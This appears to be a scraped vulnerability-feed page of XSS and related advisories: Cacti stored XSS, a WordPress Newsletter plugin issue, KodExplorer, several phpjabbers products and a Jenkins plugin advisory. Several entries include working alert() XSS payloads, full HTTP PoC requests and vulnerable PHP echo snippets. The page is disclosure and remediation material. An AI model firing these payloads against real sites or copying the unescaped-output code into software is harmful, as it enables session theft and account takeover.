SearchBlox before Version 9.1 is vulnerable to cross-origin resource sharing misconfiguration.

**Changelog**

*   fixed: Search support for special characters such as backslash and colon
*   fixed: Issue with indexing URLs with spaces
*   fixed: Issue with long title PDF titles
*   fixed: SearchBlox minor search issues
*   fixed: Security Vulnerability issues listed below
    *   Vulnerability #1: Stored Cross-site Scripting – Username Field
    *   Vulnerability #2: Stored Cross-site Scripting – Role Field
    *   Vulnerability #3: Stored Cross-site Scripting – Group, New-group Fields
    *   Vulnerability #4: Stored Cross-site Scripting –Add cluster node, Name of the cluster Fields of Cluster
    *   Vulnerability #5: Stored Cross-site Scripting – Multiple Fields of Featured Results.
    *   Vulnerability #6: Privilege Escalation: Lower user has access to Admin Tab
*   fixed: Issue with ignore canonical setting on refresh
*   fixed: Issue with the description in Mongo DB, Database collection
*   fixed: Updated libraries for Database collection
*   fixed: Encoding issue with search servlet
*   fixed: Jetty security fix
*   fixed: Issue with context encoding
*   fixed: Issue with Delete API and Delete Document
*   fixed: Minor issues with HTTP collection settings
*   fixed: Issue with indexing of Visio file
*   fixed: Replicas in the cluster have been set to 2 by default
*   fixed: Issue with indexing URLs with encoded values
*   fixed: Issue with search context with HTML tags
*   fixed: Issue with search settings update while uploading config file
*   fixed: Issue with the hyphen in phrase and exact match in featured results
*   fixed: Issue with stopwords in URL

CVE-2020-10132: Version 9.1

Cacti is an open source operational monitoring and fault management framework. Affected versions are subject to a Stored Cross-Site-Scripting (XSS) Vulnerability which allows an authenticated user to poison data stored in the _cacti_'s database. These data will be viewed by administrative _cacti_ accounts and execute JavaScript code in the victim's browser at view-time. The script under `reports_admin.php` displays reporting information about graphs, devices, data sources etc. _CENSUS_ found that an adversary that is able to configure a malicious device name, related to a graph attached to a report, can deploy a stored XSS attack against any super user who has privileges of viewing the `reports_admin.php` page, such as administrative accounts. A user that possesses the _General Administration>Sites/Devices/Data_ permissions can configure the device names in _cacti_. This configuration occurs through `http://<HOST>/cacti/host.php`, while the rendered malicious payload is exhibited at `http://<HOST>/cacti/reports_admin.php` when the a graph with the maliciously altered device name is linked to the report. This issue has been addressed in version 1.2.25. Users are advised to upgrade. Users unable to upgrade should manually filter HTML output.


**Summary**

A Stored Cross-Site-Scripting Vulnerability allows an authenticated user to poison data stored in the _cacti_'s database. These data will be viewed by administrative _cacti_ accounts and execute JavaScript code in the victim's browser at view-time.

**Details**

The script under reports_admin.php displays reporting information about graphs, devices, data sources etc. _CENSUS_ found that an adversary that is able to configure a malicious device name, related to a graph attached to a report, can deploy a stored XSS attack against any super user who has privileges of viewing the reports_admin.php page, such as administrative accounts.

A user that possesses the _General Administration>Sites/Devices/Data_ permissions can configure the device names in _cacti_. This configuration occurs through http://<HOST>/cacti/host.php, while the rendered malicious payload is exhibited at http://<HOST>/cacti/reports_admin.php when the a graph with the maliciously altered device name is linked to the report.

We will follow with displaying the code call-pipeline that leads to the dangerous rendering code-block:

*   reports_admin.php:156

*   html_reports.php:1585

print reports\_generate\_html($report\['id'\], REPORTS\_OUTPUT\_STDOUT);

*   reports.php:902

$outstr .= reports\_expand\_device($report, $item, $item\['host\_id'\], $output, $format\_ok, $theme);

*   reports.php:1048

$title = $title\_delimiter . \_\_('Device:') . " $description";

*   reports.php:1136

$outstr .= "\\t\\t\\t\\t$title" . PHP\_EOL;

Notice how the $title variable is concatenated with a non-escaped $description, which has the maliciously altered device name in it. This enables a malicious payload to break out of the current text context and append JavaScript code in the victim browser's DOM, thus leading to a Stored XSS attack.

A Stored XSS attack, aka Stored Cross Site Scripting attack, is manifested when an adversary poisons data that is stored in the backend with malicious JavaScript code. If a site is vulnerable to a stored XSS attack then when the poisoned data get rendered on the victim's browser, the malicious code block will become part of the browser's DOM and with thus be executed at view-time.

**PoC**

To verify the issue, one can perform a call of the following form, in order to place a malicious payload in the cacti database. Note that the relevant device is related to the graph which is linked to the targeted report page.

    POST /cacti/host.php?header=false HTTP/1.1
    Host: <HOST>
    Content-Length: 739
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://<HOST>
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: <COOKIE>
    Connection: close
    
    __csrf_magic=<TOKEN>&description=%3Cscript%3Ealert('malicious+code+in+device+name')%3C%2Fscript%3E&hostname=localhost&location=&poller_id=1&site_id=1&host_template_id=1&device_threads=1&snmp_version=2&snmp_community=public&snmp_security_level=authPriv&snmp_auth_protocol=MD5&snmp_username=&snmp_password=&snmp_password_confirm=&snmp_priv_protocol=DES&snmp_priv_passphrase=&snmp_priv_passphrase_confirm=&snmp_context=&snmp_engine_id=&snmp_port=161&snmp_timeout=500&max_oids=10&bulk_walk_size=-1&availability_method=2&ping_method=1&ping_port=23&ping_timeout=400&ping_retries=1&notes=&external_id=&id=4&save_component_host=1&graph_template_id=26&snmp_query_id=5&reindex_method=1&action=save
    

For the attacker to place the malicious payload, the aforementioned _General Administration>Sites/Devices/Data_ privileges are required. For the victim to view the malicious information, they should be permitted to view reports_admin.php page which is an Administrator-only privilege.

An example request that renders the malicious data can be found below:

    GET /cacti/reports_admin.php?action=edit&id=1&tab=preview HTTP/1.1
    Host: <HOST>
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: <COOKIE>
    Connection: close
    

Following the rendered payload in the response of the request above

<tr class\="text\_row"\>
<td class\="text" style\="text-align:center;font-size: 10pt;"\>
Device: <script\>alert('malicious code in device name')</script\>
</td\>
</tr\> 

**Impact**

To perform the Stored XSS attack the adversary needs to be an authorized cacti user with the following permissions:

*   _General Administration>Sites/Devices/Data_ in order to create a device or edit an existent device's name

The victim of this attack is the administrator of the page or any other super user who can view the reports_admin.php page

Once the attacker has executed the malicious JavaScript within the victim's browser it is possible to

*   perform a victim-account takeover
*   perform arbitrary actions on the platform as the victim user
*   redirect the user to a malicious website
*   ask for sensitive information, under the cover of the cacti webpage
*   run browser related exploits and attacks
*   join a browser botnet and participate in a DDoS attack

**Remediation**

Before rendering this user supplied information either make this be a text element in the rendered HTML or escape (by using HTML entities) the content so that the malicious block will not be considered as code in the final HTML output.

> The issue was identified by _Vissarion Moutafis_ of _CENSUS_. _CENSUS_ will be releasing an advisory for this issue once a release that fixes the issue becomes available (or in 90 days, whichever comes first). Should you require assistance with the review of the patch we will be more than happy to help!

CVE-2023-39511: Cross-Site Scripting vulnerability with Device Name when editing Graphs whilst managing Reports

WordPress Newsletter plugin versions 7.8.9 and below suffer from a persistent cross site scripting vulnerability.

    Vulnerability Summary from Wordfence IntelligenceDescription: Newsletter <= 7.8.9 – Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Affected Plugin: Newsletter – Send awesome emails from WordPressPlugin Slug: newsletterAffected Versions: <= 7.8.9CVE ID: CVE-2023-4772CVSS Score: 6.4 (Medium)CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:NResearcher/s: Lana Codes Fully Patched Version: 7.9.0The Newsletter plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘newsletter_form’ shortcode in versions up to, and including, 7.8.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.Technical AnalysisThe Newsletter plugin is a newsletter and email marketing system, with a drag and drop newsletter builder and many other features. It provides a shortcode ([newsletter_form]) that displays the newsletter subscription form when added to a WordPress page.Unfortunately, insecure implementation of the plugin’s shortcode functionality allows for the injection of arbitrary web scripts into these pages. Examining the code reveals that the shortcode has two types, one of which is the get_subscription_form_minimal method handling the minimal type in the NewsletterSubscription class. In vulnerable versions, this method does not adequately sanitize the user-supplied ‘class’ input, and also does not adequately escape the ‘class’ output when it displays the form. This makes it possible to inject attribute-based Cross-Site Scripting payloads via the ‘class’ attribute.[View this code snippet on the blog.] This makes it possible for threat actors to carry out stored XSS attacks. Once a script is injected into a page or post, it will execute each time a user accesses the affected page. While this vulnerability does require that a trusted contributor account is compromised, or that a user be able to register as a contributor, successful threat actors could steal sensitive information, manipulate site content, inject administrative users, edit files, or redirect users to malicious websites which are all severe consequences.Shortcode Exploit PossibilitiesSome previous versions of WordPress contained a vulnerability that allowed shortcodes supplied by unauthenticated commenters to be rendered in certain rare configurations, though the vast majority of sites have been automatically upgraded to a patched release of WordPress as of this writing.Disclosure TimelineAugust 16, 2023 – Wordfence Threat Intelligence team discovers the stored XSS vulnerability in Newsletter.August 16, 2023 – We initiate contact with the plugin vendor asking that they confirm the inbox for handling the discussion.August 17, 2023 – The vendor confirms the inbox for handling the discussion.August 17, 2023 – We send over the full disclosure details. The vendor acknowledges the report and begins working on a fix.August 17, 2023 – The fully patched version, 7.9.0, is released.ConclusionIn this blog post, we have detailed a stored XSS vulnerability within the Newsletter plugin affecting versions 7.8.9 and earlier. This vulnerability allows authenticated threat actors with contributor-level permissions or higher to inject malicious web scripts into pages that execute when a user accesses an affected page. The vulnerability has been fully addressed in version 7.9.0 of the plugin.We encourage WordPress users to verify that their sites are updated to the latest patched version of Newsletter.All Wordfence users, including those running Wordfence Premium, Wordfence Care, and Wordfence Response, as well as sites still running the free version of Wordfence, are fully protected against this vulnerability.If you know someone who uses this plugin on their site, we recommend sharing this advisory with them to ensure their site remains secure, as this vulnerability poses a significant risk.For security researchers looking to disclose vulnerabilities responsibly and obtain a CVE ID, you can submit your findings to Wordfence Intelligence and potentially earn a spot on our leaderboard.

WordPress Newsletter 7.8.9 Cross Site Scripting

A Cross Site Scrtpting (XSS) vulnerability in KodExplorer 4.45 allows remote attackers to run arbitrary code via /index.php page.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

Eric1253 opened this issue

Jul 8, 2021

· 1 comment

Closed

**New Reflected XSS in KodExplorer #482**

Eric1253 opened this issue

Jul 8, 2021

· 1 comment

**Comments**

**Analyse**

file: app/template/api/view.html

    G.shareInfo = {
        path:"<?php echo $_GET['path'];?>",
        name:"<?php echo get_path_this($_GET['path']);?>",
        mtime:0,
        size:0
    }
    

No any safety check for variable(path), it direct to echo in the page.  
Attacker can use this bug to send fish email to administrator and catch the admin's cookie so that control the website.

**Poc**

    http://example.com/index.php?explorer/fileView&path=</script><script>alert(1234)</script>
    

**Screenshots**

Local Website Test：

thanks for your job. we will fixed it soon.

2 participants

CVE-2021-36646: New Reflected XSS in KodExplorer · Issue #482 · kalcaddle/KodExplorer

Cleaning Business Software version 1.0 suffers from a cross site scripting vulnerability.

    ## Title: Cleaning Business Software-1.0 XSS-Reflected## Author: nu11secur1ty## Date: 09/06/2023## Vendor: https://www.phpjabbers.com/## Software: https://www.phpjabbers.com/cleaning-business-software/#sectionDemo## Reference: https://portswigger.net/web-security/cross-site-scripting/reflected## Description:The value of the index request parameter is copied into the value ofan HTML tag attribute which is encapsulated in double quotation marks.The payload ys2hj"><script>alert(1)</script>u8zwj was submitted in theindex parameter. This input was echoed unmodified in the application'sresponse.The attacker can get all cookie information about the user session!STATUS: HIGH Vulnerability[+]Testing Payload:```GETGET /1693971587_409/index.php?controller=pjFront&action=pjActionServices&locale=1&index=3514ys2hj%22%3e%3cscript%3ealert(1)%3c%2fscript%3eu8zwjHTTP/1.1Host: demo.phpjabbers.comAccept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141Safari/537.36Connection: closeCache-Control: max-age=0Cookie: CleaningBusiness=v1s3db2187im339fcbqifuabg7Origin: http://demo.phpjabbers.comReferer: http://demo.phpjabbers.com/Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Cleaning-Business-Software-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/09/cleaning-business-software-10-xss.html)## Time spent:00:25:00

Cleaning Business Software 1.0 Cross Site Scripting

Event Booking Calendar version 4.0 suffers from a cross site scripting vulnerability.

    ## Title: Event Booking Calendar-4.0 XSS-Reflected## Author: nu11secur1ty## Date: 09/06/2023## Vendor: https://www.phpjabbers.com/## Software: https://www.phpjabbers.com/event-booking-calendar/#sectionDemo## Reference: https://portswigger.net/web-security/cross-site-scripting/reflected## Description:The value of the index request parameter is copied into the value ofan HTML tag attribute which is encapsulated in double quotation marks.The payload ap5yf"><script>alert(1)</script>n9d5d was submitted in theindex parameter. This input was echoed unmodified in the application'sresponse.The attacker can make a specially crafted malicious URL and spread itinto the network, to infect every user of this system who clicks on itand visit it.STATUS: HIGH Vulnerability[+]Testing Payload:```GETGET /1693985138_790/index.php?controller=pjFrontPublic&action=pjActionLoadEvents&session_id=&theme=theme7&locale=1&hide=0&index=4786ap5yf%22%3e%3cscript%3ealert(1)%3c%2fscript%3en9d5d&show_header=1&show_icons=1&show_categories=1&category_id=0&month=09&year=2023&view=calendar&period=&page=1HTTP/1.1Host: demo.phpjabbers.comAccept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141Safari/537.36Connection: closeCache-Control: max-age=0Cookie: _ga=GA1.2.1968270768.1693986414;_gid=GA1.2.227754763.1693986414; _gat=1;_fbp=fb.1.1693986413650.1548084853;_ga_NME5VTTGTT=GS1.2.1693986413.1.0.1693986413.60.0.0X-Requested-With: XMLHttpRequestReferer: https://demo.phpjabbers.com/1693985138_790/preview.php?lid=1Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Event-Booking-Calendar-4.0%20)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/09/event-booking-calendar-40-xss-reflected.html)## Time spent:01:25:00

Event Booking Calendar 4.0 Cross Site Scripting

Cinema Booking System version 1.0 suffers from a cross site scripting vulnerability.

    ## Title: Cinema Booking System-1.0 XSS-Reflected## Author: nu11secur1ty## Date: 09/05/2023## Vendor: https://www.phpjabbers.com/## Software: https://www.phpjabbers.com/car-rental-script/## Reference: https://portswigger.net/web-security/sql-injection## Description:The name of an arbitrarily supplied URL parameter is copied into thevalue of an HTML tag attribute which is encapsulated in doublequotation marks. The payload kfimq"><script>alert(1)</script>k0a57 wassubmitted in the name of an arbitrarily supplied URL parameter. Thisinput was echoed unmodified in the application's response. Theattacker can trick all users of this system into visiting a veryDANGEROUS URL address, and the worst thing is when they try to log into this system, by using his malicious link!STATUS: HIGH-CRITICAL Vulnerability[+]Testing Payload:```GET /1693939439_790/index.php/kfimq"><script>alert(1)</script>k0a57?controller=pjAdmin&action=pjActionLoginHTTP/1.1Host: demo.phpjabbers.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141Safari/537.36Connection: closeCache-Control: max-age=0Upgrade-Insecure-Requests: 1Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Cinema-Booking-System-1.0%20)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/09/cinema-booking-system-10-xss-reflected.html)## Time spent:00:17:00

Cinema Booking System 1.0 Cross Site Scripting

Jenkins Azure AD Plugin 396.v86ce29279947 and earlier, except 378.380.v545b_1154b_3fb_, uses a non-constant time comparison function when checking whether the provided and expected CSRF protection nonce are equal, potentially allowing attackers to use statistical methods to obtain a valid nonce.

This advisory announces vulnerabilities in the following Jenkins deliverables:

*   Assembla Auth Plugin
*   AWS CodeCommit Trigger Plugin
*   Azure AD Plugin
*   Bitbucket Push and Pull Request Plugin
*   Frugal Testing Plugin
*   Google Login Plugin
*   Ivy Plugin
*   Job Configuration History Plugin
*   Pipeline Maven Integration Plugin
*   Qualys Container Scanning Connector Plugin
*   SSH2 Easy Plugin
*   TAP Plugin

**Descriptions****Path traversal allows exploiting XSS vulnerability in Job Configuration History Plugin**

**SECURITY-3233 / CVE-2023-41930 (path traversal), CVE-2023-41931 (XSS)**  
**Severity (CVSS):** High  
**Affected plugin: jobConfigHistory**  
**Description:**

Job Configuration History Plugin 1227.v7a\_79fc4dc01f and earlier does not restrict a name query parameter when rendering a history entry. This allows attackers to have Jenkins render a manipulated configuration history that was not created by the plugin.

The history view does not property sanitize or escape the timestamp value from history entries when rendering a history entry. This typically isn’t a problem, as the value is numeric in genuine history entries. Combined with the path traversal vulnerability, this results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with the ability to create a file on the controller (e.g., archived artifacts).

Job Configuration History Plugin 1229.v3039470161a\_d restricts the name query parameter when rendering a history entry, and escapes the timestamp value from history entries on the history view.

**Path traversal allows exploiting XXE vulnerability in Job Configuration History Plugin**

**SECURITY-3235 / CVE-2023-41932 (path traversal), CVE-2023-41933 (XXE)**  
**Severity (CVSS):** High  
**Affected plugin: jobConfigHistory**  
**Description:**

Job Configuration History Plugin 1227.v7a\_79fc4dc01f and earlier does not restrict timestamp query parameters in multiple endpoints. This allows attackers with Job Config History/DeleteEntry permission to delete attacker-specified directories on the Jenkins controller file system as long as they contain a file called history.xml.

Additionally, Job Configuration History Plugin 1227.v7a\_79fc4dc01f and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks. This allows attackers with Item/Configure permission to have Jenkins parse a crafted XML document that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.

Job Configuration History Plugin 1229.v3039470161a\_d restricts timestamp query parameters in the affected endpoints, and disables external entity resolution for its XML parser.

**Improper masking of credentials in Pipeline Maven Integration Plugin**

**SECURITY-3257 / CVE-2023-41934**  
**Severity (CVSS):** Medium  
**Affected plugin: pipeline-maven**  
**Description:**

Pipeline Maven Integration Plugin integrates with Config File Provider Plugin to specify custom Maven settings, including credentials for authentication.

Pipeline Maven Integration Plugin 1330.v18e473854496 and earlier does not properly mask (i.e., replace with asterisks) usernames of credentials specified in custom Maven settings in Pipeline build logs if "Treat username as secret" is checked.

Pipeline Maven Integration Plugin 1331.v003efa\_fd6e81 masks usernames of credentials specified in custom Maven settings files in Pipeline build logs.

**Non-constant time nonce comparison in Azure AD Plugin**

**SECURITY-3227 / CVE-2023-41935**  
**Severity (CVSS):** Low  
**Affected plugin: azure-ad**  
**Description:**

Azure AD Plugin 396.v86ce29279947 and earlier, except 378.380.v545b\_1154b\_3fb\_, does not use a constant-time comparison when checking whether the provided and expected CSRF protection nonce are equal.

This could potentially allow attackers to use statistical methods to obtain a valid nonce.

Azure AD Plugin 397.v907382dd9b\_98 uses a constant-time comparison when validating the nonce.

**Non-constant time token comparison in Google Login Plugin**

**SECURITY-3228 / CVE-2023-41936**  
**Severity (CVSS):** Low  
**Affected plugin: google-login**  
**Description:**

Google Login Plugin 1.7 and earlier does not use a constant-time comparison when checking whether the provided and expected token are equal.

This could potentially allow attackers to use statistical methods to obtain a valid token.

Google Login Plugin 1.8 uses a constant-time comparison when validating the token.

**SSRF vulnerability in Bitbucket Push and Pull Request Plugin allows capturing credentials**

**SECURITY-3165 / CVE-2023-41937**  
**Severity (CVSS):** Medium  
**Affected plugin: bitbucket-push-and-pull-request**  
**Description:**

Bitbucket Push and Pull Request Plugin provides a webhook endpoint at /bitbucket-hook/ to receive webhook notifications.

When acting on these notifications, Bitbucket Push and Pull Request Plugin 2.4.0 through 2.8.3 (both inclusive) trusts values provided in the webhook payload, including certain URLs, and uses configured Bitbucket credentials to connect to those URLs. This allows attackers to capture Bitbucket credentials stored in Jenkins by sending a crafted webhook payload.

Successful exploitation requires that a build is triggered. This is the case when the repository has changed since the previous build, or the option "Trigger also if nothing has changed in the repo" is checked.

Bitbucket Push and Pull Request Plugin 2.8.4 connects to the Bitbucket endpoint configured for the job when acting on a webhook notification.

**Incorrect permission checks in Qualys Container Scanning Connector Plugin**

**SECURITY-3018 / CVE pending**  
**Severity (CVSS):** High  
**Affected plugin: qualys-cs**  
**Description:**

Qualys Container Scanning Connector Plugin 1.6.2.6 and earlier does not correctly perform a permission check in multiple HTTP endpoints.

This allows attackers with global Item/Configure permission (while lacking Item/Configure permission on any particular job) to do the following:

*   Enumerate credentials IDs of credentials stored in Jenkins. Those can be used as part of an attack to capture the credentials using another vulnerability.
    
*   Connect to an attacker-specified webserver using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.
    

Qualys Container Scanning Connector Plugin 1.6.2.7 requires global Overall/Administer permission, or Item/Configure permission on a job, to access the affected endpoint.

**XXE vulnerability in Ivy Plugin**

**SECURITY-2924 / CVE-2022-46751**  
**Severity (CVSS):** High  
**Affected plugin: ivy**  
**Description:**

Ivy Plugin 2.5 and earlier bundles versions of Apache Ivy vulnerable to CVE-2022-46751.

This allows attackers able to control the input file for the "Trigger the build of other projects based on the Ivy dependency management system" post-build step to have Jenkins parse a crafted XML document that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.

**CSRF vulnerability in Ivy Plugin**

**SECURITY-3093 / CVE-2023-41938**  
**Severity (CVSS):** Medium  
**Affected plugin: ivy**  
**Description:**

Ivy Plugin 2.5 and earlier does not require POST requests for an HTTP endpoint, resulting in a cross-site request forgery (CSRF) vulnerability.

This vulnerability allows attackers to delete disabled modules.

**Disabled permissions can be granted by SSH2 Easy Plugin**

**SECURITY-3064 / CVE-2023-41939**  
**Severity (CVSS):** Medium  
**Affected plugin: ssh2easy**  
**Description:**

SSH2 Easy Plugin 1.4 and earlier does not verify that permissions configured to be granted are enabled. This may allow users formerly granted (typically optional permissions, like Overall/Manage) to access functionality they’re no longer entitled to.

As a workaround, administrators can save the permission configuration after disabling a permission, as that will overwrite any permission assignments of disabled permissions.

The affected features have been removed without replacement in SSH2 Easy Plugin 1.6.

**Stored XSS vulnerability in TAP Plugin**

**SECURITY-3190 / CVE-2023-41940**  
**Severity (CVSS):** High  
**Affected plugin: tap**  
**Description:**

TAP Plugin 2.3 and earlier does not escape TAP file contents.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control TAP file contents.

**Missing permission check in AWS CodeCommit Trigger Plugin allows enumerating credentials IDs**

**SECURITY-3101 (1) / CVE-2023-41941**  
**Severity (CVSS):** Medium  
**Affected plugin: aws-codecommit-trigger**  
**Description:**

AWS CodeCommit Trigger Plugin 3.0.12 and earlier does not perform a permission check in an HTTP endpoint.

This allows attackers with Overall/Read permission to enumerate credentials IDs of AWS credentials stored in Jenkins. Those can be used as part of an attack to capture the credentials using another vulnerability.

**CSRF vulnerability and missing permission check in AWS CodeCommit Trigger Plugin**

**SECURITY-3101 (2) / CVE-2023-41942 (CSRF), CVE-2023-41943 (permission check)**  
**Severity (CVSS):** Medium  
**Affected plugin: aws-codecommit-trigger**  
**Description:**

AWS CodeCommit Trigger Plugin 3.0.12 and earlier does not perform a permission check in an HTTP endpoint.

This allows attackers with Overall/Read permission to clear the SQS queue.

Additionally, this endpoint does not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.

**HTML injection vulnerability in AWS CodeCommit Trigger Plugin**

**SECURITY-3102 / CVE-2023-41944**  
**Severity (CVSS):** Medium  
**Affected plugin: aws-codecommit-trigger**  
**Description:**

AWS CodeCommit Trigger Plugin 3.0.12 and earlier does not escape the queue name parameter passed to a form validation URL, when rendering an error message.

This results in an HTML injection vulnerability.

Since Jenkins 2.275 and LTS 2.263.2, a security hardening for form validation responses prevents JavaScript execution, so no scripts can be injected.

**Disabled permissions granted by Assembla Auth Plugin**

**SECURITY-3065 / CVE-2023-41945**  
**Severity (CVSS):** Medium  
**Affected plugin: assembla-auth**  
**Description:**

Assembla Auth Plugin provides an authorization strategy that defines four levels of access to Jenkins, based on the corresponding permissions in Assembla spaces: ALL, EDIT, VIEW, and NONE.

Assembla Auth Plugin 1.14 and earlier does not verify that the permissions it grants are enabled. This results in users with EDIT permissions to be granted Overall/Manage and Overall/SystemRead permissions, even if those permissions are disabled and should not be granted.

Additionally, the plugin also grants the deprecated permissions Overall/RunScripts, Overall/UploadPlugins and Overall/ConfigureUpdateCenter to users with EDIT access. These permissions allow arbitrary code execution through various means in Jenkins before 2.222. Additionally, plugins not yet adapted to the changes in Jenkins 2.222 may also provide access to sensitive features to users with these permissions.

**CSRF vulnerability and missing permission checks in Frugal Testing Plugin**

**SECURITY-3082 / CVE-2023-41946 (CSRF), CVE-2023-41947 (permission check)**  
**Severity (CVSS):** Medium  
**Affected plugin: frugal-testing**  
**Description:**

Frugal Testing Plugin 1.1 and earlier does not perform permission checks in several HTTP endpoints.

This allows attackers with Overall/Read permission to do the following:

*   Connect to Frugal Testing using attacker-specified username and password.
    
*   Retrieve test IDs and names from Frugal Testing, if a valid credential corresponds to the attacker-specified username.
    

Additionally, these endpoints do not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.

**Severity**

*   SECURITY-2924: High
*   SECURITY-3018: High
*   SECURITY-3064: Medium
*   SECURITY-3065: Medium
*   SECURITY-3082: Medium
*   SECURITY-3093: Medium
*   SECURITY-3101 (1): Medium
*   SECURITY-3101 (2): Medium
*   SECURITY-3102: Medium
*   SECURITY-3165: Medium
*   SECURITY-3190: High
*   SECURITY-3227: Low
*   SECURITY-3228: Low
*   SECURITY-3233: High
*   SECURITY-3235: High
*   SECURITY-3257: Medium

**Affected Versions**

*   **Assembla Auth Plugin** up to and including 1.14
*   **AWS CodeCommit Trigger Plugin** up to and including 3.0.12
*   **Azure AD Plugin** up to and including 396.v86ce29279947
*   **Bitbucket Push and Pull Request Plugin** up to and including 2.8.3
*   **Frugal Testing Plugin** up to and including 1.1
*   **Google Login Plugin** up to and including 1.7
*   **Ivy Plugin** up to and including 2.5
*   **Job Configuration History Plugin** up to and including 1227.v7a\_79fc4dc01f
*   **Pipeline Maven Integration Plugin** up to and including 1330.v18e473854496
*   **Qualys Container Scanning Connector Plugin** up to and including 1.6.2.6
*   **SSH2 Easy Plugin** up to and including 1.4
*   **TAP Plugin** up to and including 2.3

**Fix**

*   **Azure AD Plugin** should be updated to version 397.v907382dd9b\_98 or 378.380.v545b\_1154b\_3fb\_
*   **Bitbucket Push and Pull Request Plugin** should be updated to version 2.8.4
*   **Google Login Plugin** should be updated to version 1.8
*   **Job Configuration History Plugin** should be updated to version 1229.v3039470161a\_d
*   **Pipeline Maven Integration Plugin** should be updated to version 1331.v003efa\_fd6e81
*   **Qualys Container Scanning Connector Plugin** should be updated to version 1.6.2.7
*   **SSH2 Easy Plugin** should be updated to version 1.6

These versions include fixes to the vulnerabilities described above. All prior versions are considered to be affected by these vulnerabilities unless otherwise indicated.

As of publication of this advisory, no fixes are available for the following plugins:

*   Assembla Auth Plugin
*   AWS CodeCommit Trigger Plugin
*   Frugal Testing Plugin
*   Ivy Plugin
*   TAP Plugin

Learn why we announce these issues.

**Credit**

The Jenkins project would like to thank the reporters for discovering and reporting these vulnerabilities:

*   **Andrea Chiera, CloudBees, Inc.** for SECURITY-3190, SECURITY-3233, SECURITY-3235
*   **CC Bomber, Kitri BoB** for SECURITY-2924
*   **Kevin Guerroudj, CloudBees, Inc.** for SECURITY-3093, SECURITY-3101 (1), SECURITY-3101 (2), SECURITY-3102
*   **Kevin Guerroudj, CloudBees, Inc. and Yaroslav Afenkin, CloudBees, Inc.** for SECURITY-3064, SECURITY-3065
*   **Tony Torralba (@atorralba), GitHub Security Lab and Alvaro Muñoz (@pwntester), GitHub Security Lab** for SECURITY-3165
*   **Yaroslav Afenkin, CloudBees, Inc.** for SECURITY-3018, SECURITY-3082, SECURITY-3227, SECURITY-3228, SECURITY-3257

CVE-2023-41935: Jenkins Security Advisory 2023-09-06

Jenkins Job Configuration History Plugin 1227.v7a_79fc4dc01f and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

CVE-2023-41933: Jenkins Security Advisory 2023-09-06

Jenkins TAP Plugin 2.3 and earlier does not escape TAP file contents, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control TAP file contents.

Tag

#xss